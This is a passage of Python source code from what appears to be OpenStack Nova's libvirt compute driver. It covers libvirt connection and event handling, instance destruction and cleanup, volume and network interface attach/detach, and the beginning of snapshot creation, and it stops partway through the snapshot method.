LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 6)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_HOST_CPU_VERSION = (0, 9, 10)
MIN_LIBVIRT_CLOSE_CALLBACK_VERSION = (1, 0, 1)
MIN_LIBVIRT_DEVICE_CALLBACK_VERSION = (1, 1, 1)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 0, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
# block size tuning requirements
MIN_LIBVIRT_BLOCKIO_VERSION = (0, 10, 2)
# BlockJobInfo management requirement
MIN_LIBVIRT_BLOCKJOBINFO_VERSION = (1, 1, 1)
def libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._caps = None
self._vcpu_total = 0
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
vif_class = importutils.import_class(CONF.libvirt_vif_driver)
self.vif_driver = vif_class(self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt_volume_drivers, self)
self.dev_filter = pci_whitelist.get_pci_devices_filter()
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"unsafe",
]
for mode_str in CONF.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_('Invalid cachemode %(cache_mode)s specified '
'for disk type %(disk_type)s.'),
{'cache_mode': cache_mode, 'disk_type': disk_type})
continue
self.disk_cachemodes[disk_type] = cache_mode
self._volume_api = volume.API()
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
# provided the filesystem is cache coherent (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
@staticmethod
def _has_min_version(conn, lv_ver=None, hv_ver=None, hv_type=None):
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if libvirt_version < utils.convert_version_to_int(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if hypervisor_version < utils.convert_version_to_int(hv_ver):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._has_min_version(self._conn, lv_ver, hv_ver, hv_type)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread.
"""
if self._event_queue is None:
LOG.debug(_("Event loop thread is not active, "
"discarding event %s") % event)
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
self.emit_event(event)
except native_Queue.Empty:
pass
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug(_("Starting native event thread"))
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug(_("Starting green dispatch thread"))
eventlet.spawn(self._dispatch_thread)
def init_host(self, host):
libvirt.registerErrorHandler(libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
if not self.has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.'),
{'major': major, 'minor': minor, 'micro': micro})
self._init_events()
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
LOG.debug(_('Connecting to libvirt: %s'), self.uri())
try:
if not CONF.libvirt_nonblocking:
wrapped_conn = self._connect(self.uri(),
self.read_only)
else:
wrapped_conn = tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
self._connect, self.uri(), self.read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
is_connected = bool(wrapped_conn)
self.set_host_enabled(CONF.host, is_connected)
self._wrapped_conn = wrapped_conn
try:
LOG.debug(_("Registering for lifecycle events %s") %
str(self))
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_("URI %(uri)s does not support events: %(error)s"),
{'uri': self.uri(), 'error': e})
if self._has_min_version(wrapped_conn,
MIN_LIBVIRT_CLOSE_CALLBACK_VERSION):
try:
LOG.debug(_("Registering for connection events: %s") %
str(self))
wrapped_conn.registerCloseCallback(
self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warn(_("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self.uri(), 'error': e})
return wrapped_conn
_conn = property(_get_connection)
def _close_callback(self, conn, reason, opaque):
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
_error = _("Connection to libvirt lost: %s") % reason
LOG.warn(_error)
self._wrapped_conn = None
# Disable compute service to avoid
# new instances of being scheduled on this host.
self.set_host_enabled(CONF.host, _error)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug(_('Connection to libvirt broke'))
return False
raise
@staticmethod
def uri():
if CONF.libvirt_type == 'uml':
uri = CONF.libvirt_uri or 'uml:///system'
elif CONF.libvirt_type == 'xen':
uri = CONF.libvirt_uri or 'xen:///'
elif CONF.libvirt_type == 'lxc':
uri = CONF.libvirt_uri or 'lxc:///'
else:
uri = CONF.libvirt_uri or 'qemu:///system'
return uri
@staticmethod
def _connect(uri, read_only):
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
LOG.warning(
_("Can not handle authentication request for %d credentials")
% len(creds))
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
_connect_auth_cb,
None]
try:
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
return libvirt.openAuth(uri, auth, flags)
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
notifier.get_notifier('compute').error(
nova_context.get_admin_context(),
'compute.libvirt.error', payload)
raise exception.HypervisorUnavailable(host=CONF.host)
def get_num_instances(self):
"""Efficient override of base instance_exists method."""
return self._conn.numOfDomains()
def instance_exists(self, instance_name):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance_name)
return True
except exception.NovaException:
return False
# TODO(Shrews): Remove when libvirt Bugzilla bug # 836647 is fixed.
def list_instance_ids(self):
if self._conn.numOfDomains() == 0:
return []
return self._conn.listDomainsID()
def list_instances(self):
names = []
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._lookup_by_id(domain_id)
names.append(domain.name())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
# extend instance list to contain also defined domains
names.extend([vm for vm in self._conn.listDefinedDomains()
if vm not in names])
return names
def list_instance_uuids(self):
uuids = set()
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._lookup_by_id(domain_id)
uuids.add(domain.UUIDString())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
# extend instance list to contain also defined domains
for domain_name in self._conn.listDefinedDomains():
try:
uuids.add(self._lookup_by_name(domain_name).UUIDString())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
return list(uuids)
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for vif in network_info:
self.vif_driver.plug(instance, vif)
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
for vif in network_info:
self.vif_driver.unplug(instance, vif)
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
if state == power_state.SHUTDOWN:
is_okay = True
elif errcode == libvirt.VIR_ERR_OPERATION_TIMEOUT:
LOG.warn(_("Cannot destroy instance, operation time out"),
instance=instance)
reason = _("operation time out")
raise exception.InstancePowerOffFailure(reason=reason)
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_('Error from libvirt during destroy. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.InstanceNotFound:
LOG.error(_("During wait destroy, instance disappeared."),
instance=instance)
raise loopingcall.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_("Instance destroyed successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
# this may be a endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise loopingcall.LoopingCallDone()
kwargs = {'is_running': False}
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_destroy,
old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_("Going to destroy instance again."), instance=instance)
self._destroy(instance)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True):
self._destroy(instance)
self._cleanup(context, instance, network_info, block_device_info,
destroy_disks)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug(_("Error from libvirt during undefineFlags."
" Retrying with undefine"), instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_('Error from libvirt during undefine. '
'Code=%(errcode)s Error=%(e)s') %
{'errcode': errcode, 'e': e}, instance=instance)
def _cleanup(self, context, instance, network_info, block_device_info,
destroy_disks):
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.error(_('Error from libvirt during unfilter. '
'Code=%(errcode)s Error=%(e)s') %
{'errcode': errcode, 'e': e},
instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
# FIXME(wangpan): if the instance is booted again here, such as the
# the soft reboot operation boot it here, it will
# become "running deleted", should we check and destroy
# it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
if ('data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
if destroy_disks:
#NOTE(GuanQiang): teardown lxc container to avoid resource leak
if CONF.libvirt_type == 'lxc':
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
container_root_device = instance.get('root_device_name')
disk.teardown_container(container_dir, container_root_device)
self._delete_instance_files(instance)
self._cleanup_lvm(instance)
#NOTE(haomai): destroy volumes if needed
if CONF.libvirt_images_type == 'rbd':
self._cleanup_rbd(instance)
def _cleanup_rbd(self, instance):
pool = CONF.libvirt_images_rbd_pool
volumes = libvirt_utils.list_rbd_volumes(pool)
pattern = instance['uuid']
def belongs_to_instance(disk):
return disk.startswith(pattern)
volumes = filter(belongs_to_instance, volumes)
if volumes:
libvirt_utils.remove_rbd_volumes(pool, *volumes)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
libvirt_utils.remove_logical_volumes(*disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt_images_volume_group:
vg = os.path.join('/dev', CONF.libvirt_images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['name']
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = libvirt_utils.list_logical_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug(_('Could not determine iscsi initiator name'),
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide node names'),
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide port names'),
instance=instance)
connector = {'ip': CONF.my_ip,
'host': CONF.host}
if self._initiator:
connector['initiator'] = self._initiator
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
target = libvirt_utils.get_instance_path(instance) + "_resize"
if os.path.exists(target):
shutil.rmtree(target)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def volume_driver_method(self, method_name, connection_info,
*args, **kwargs):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
method = getattr(driver, method_name)
return method(connection_info, *args, **kwargs)
def _get_volume_encryptor(self, connection_info, encryption):
encryptor = encryptors.get_volume_encryptor(connection_info,
**encryption)
return encryptor
def attach_volume(self, context, connection_info, instance, mountpoint,
encryption=None):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
# Note(cfb): If the volume has a custom block size, check that
# that we are using QEMU/KVM and libvirt >= 0.10.2. The
# presence of a block size is considered mandatory by
# cinder so we fail if we can't honor the request.
data = {}
if ('data' in connection_info):
data = connection_info['data']
if ('logical_block_size' in data or 'physical_block_size' in data):
if CONF.libvirt_type != "kvm" and CONF.libvirt_type != "qemu":
msg = _("Volume sets block size, but the current "
"libvirt hypervisor '%s' does not support custom "
"block size") % CONF.libvirt_type
raise exception.InvalidHypervisorType(msg)
if not self.has_min_version(MIN_LIBVIRT_BLOCKIO_VERSION):
ver = ".".join([str(x) for x in MIN_LIBVIRT_BLOCKIO_VERSION])
msg = _("Volume sets block size, but libvirt '%s' or later is "
"required.") % ver
raise exception.Invalid(msg)
conf = self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
def _swap_volume(self, domain, disk_path, new_path):
"""Swap existing disk with a new block device."""
# Save a copy of the domain's running XML file
xml = domain.XMLDesc(0)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# Start copy with VIR_DOMAIN_REBASE_REUSE_EXT flag to
# allow writing to existing external volume file
domain.blockRebase(disk_path, new_path, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path,
libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT)
finally:
self._conn.defineXML(xml)
def swap_volume(self, old_connection_info,
new_connection_info, instance, mountpoint):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
conf = self.volume_driver_method('connect_volume',
new_connection_info,
disk_info)
if not conf.source_path:
self.volume_driver_method('disconnect_volume',
new_connection_info,
disk_dev)
raise NotImplementedError(_("Swap only supports host devices"))
self._swap_volume(virt_dom, disk_dev, conf.source_path)
self.volume_driver_method('disconnect_volume',
old_connection_info,
disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(nova_context.get_admin_context(),
instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
# NOTE(vish):
LOG.warn(_("During detach_volume, instance disappeared."))
else:
raise
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
def attach_interface(self, instance, image_meta, vif):
virt_dom = self._lookup_by_name(instance['name'])
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
self.vif_driver.plug(instance, vif)
self.firewall_driver.setup_basic_filtering(instance, [vif])
cfg = self.vif_driver.get_config(instance, vif, image_meta,
inst_type)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError:
LOG.error(_('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, vif)
raise exception.InterfaceAttachFailed(instance)
def detach_interface(self, instance, vif):
virt_dom = self._lookup_by_name(instance['name'])
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
cfg = self.vif_driver.get_config(instance, vif, None, inst_type)
try:
self.vif_driver.unplug(instance, vif)
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(instance)
def _create_snapshot_metadata(self, base, instance, img_fmt, snp_name):
metadata = {'is_public': False,
'status': 'active',
'name': snp_name,
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
if instance['os_type']:
metadata['properties']['os_type'] = instance['os_type']
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = img_fmt
metadata['container_format'] = base.get('container_format', 'bare')
return metadata
def snapshot(self, context, instance, image_href, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
(image_service, image_id) = glance.get_remote_image_service(
context, instance['image_ref'])
base = compute_utils.get_image_metadata(
context, image_service, image_id, instance)
_image_service = glance.get_remote_image_service(context, image_href)
snapshot_image_service, snapshot_image_id = _image_service
snapshot = snapshot_image_service.show(context, snapshot_image_id)
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm and rbd as raw
if image_format == 'lvm' or image_format == 'rbd':
image_format = 'raw'
metadata = self._create_snapshot_metadata(base,
instance,
image_format,
snapshot['name'])
snapshot_name = uuid.uuid4().hex
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
